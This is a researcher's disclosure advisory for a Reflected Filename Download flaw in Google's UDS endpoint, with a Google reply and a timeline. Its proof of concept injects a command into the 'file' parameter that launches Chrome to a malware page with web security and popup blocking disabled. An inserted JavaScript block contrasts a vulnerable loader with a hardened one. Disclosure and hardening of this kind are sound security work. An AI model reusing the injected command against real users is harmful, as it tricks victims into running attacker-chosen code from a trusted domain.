Reflected Filename Download on Google

WS201510 – Reflected Filename Download on Google
by David Sopas @dsopas
www.websegura.net

Description:

I found a Reflected Filename Download on Google API – Google UDS [User Distributed Search].
For me it was a challenge and a pleasure to find this because so far I had only discovered Reflected Filename Download vulnerabilities in JSON files.
People need to consider that RFD is not a JSON issue.
You can find this type of vulnerability in other file types too, like this one in JavaScript.

The security issue is located at:

https://www.google.com/uds/?file=gdata&v=1.x

And here:

https://adwords.google.com/uds/?file=dont_exists&v=1.x

where you can inject into and manipulate the response using the file variable.
The problem is that even if the file/module doesn't exist, it returns HTTP code 200.

https://www.google.com/uds/?file=dont_exists&v=1.x

var error = new Error("Module: 'dont_exists' not found!");
error.toString = function() { return this.message; }
throw error;

[Screenshot: google_rfd_01]

Proof-of-concept:

Reflecting URL variables with HTTP code 200 is not always a good idea and gave me the opportunity to issue an RFD attack.

var error = new Error("Module: 'gdata\"||start chrome websegura.net\/malware.htm --disable-web-security --disable-popup-blocking||' not found!");
error.toString = function() { return this.message; }
throw error;

So the Reflected part is done. Now I only need to control the filename. Because of filename restrictions on the Google path, I need to use the HTML5 <a download> attribute to do this. Because of that, "only" the following browsers are supported:

– Chrome
– Opera
– Android Browser
– Chrome for Android
– Firefox [forcing the user to "Save Link As", done with a simple JavaScript return false;]

What this RFD attack does is this: when the user clicks the download link, they get a file that appears to come from Google.com [a trusted domain], which gives it credibility with the victim.
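As an added example (my own code, not Google's and not part of the original post), the following JavaScript models the kind of module-loader endpoint described above twice: a loader that reflects an unvalidated file name into a JavaScript error with a 200 status, and a hardened loader that applies the fixes a defender wants. Module names, bodies and the request values are constructed placeholders.

```javascript
// Constructed stand-in for the module table behind an endpoint such as
// /uds/?file=<name>&v=<version>; only the `file` value matters here.
const MODULES = {
  gdata: 'var gdata = {};',
};

// Mirrors the behaviour the advisory describes: the requested name is
// copied verbatim into the error body and the status is still 200, so the
// caller controls part of a response that browsers treat as a script.
function vulnerableLoader(query) {
  const file = query.file;
  const body = MODULES[file] !== undefined
    ? MODULES[file]
    : `var error = new Error("Module: '${file}' not found!");\n` +
      'error.toString = function() { return this.message; }\nthrow error;';
  return { status: 200, headers: { 'Content-Type': 'text/javascript' }, body };
}

// Only short lowercase identifiers are acceptable module names.
const MODULE_NAME = /^[a-z][a-z0-9_]{0,31}$/;

function hardenedLoader(query) {
  const file = String(query.file || '');
  const headers = {
    'Content-Type': 'text/javascript; charset=utf-8',
    // Stops the browser from sniffing the body into some other type.
    'X-Content-Type-Options': 'nosniff',
    // Server-chosen filename, so a caller cannot influence what a
    // "Save As" dialog proposes; this removes the filename half of RFD.
    'Content-Disposition': 'inline; filename="uds.js"',
  };
  const known = MODULE_NAME.test(file) &&
    Object.prototype.hasOwnProperty.call(MODULES, file);
  if (!known) {
    // Generic body that never echoes input, and a real 404 this time.
    return { status: 404, headers, body: 'throw new Error("Module not found");' };
  }
  return { status: 200, headers, body: MODULES[file] };
}

// Constructed request whose `file` value carries a quote-breaking suffix.
const sample = { file: 'gdata"||injected||\'', v: '1.x' };
console.log(vulnerableLoader(sample));
console.log(hardenedLoader(sample));
```

Running the block shows the injected text inside the first response and absent from the second, which is the property a regression test for this class of bug should assert.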

[Screenshot: google_rfd_02]
[Screenshot: google_rfd_03]

Google replied:

The reward panel reviewed this finding and decided that it does not meet the bar for a financial reward, but we would like to acknowledge your contribution to Google security in our Hall of Fame. A general perspective on the issue is shared here: http://lcamtuf.blogspot.com/2014/03/messing-around-with-download.html
That said, we do appreciate your report and would like to add you to our Hall of Fame available at the following URL:

This didn't get me any bounty, but they were nice enough to give me an Honorable Mention, my second one :)

Timeline:

16 Mar 15 – Submitted to Google
18 Mar 15 – Google filed the bug
07 Apr 15 – Google replied
08 Apr 15 – Full disclosure
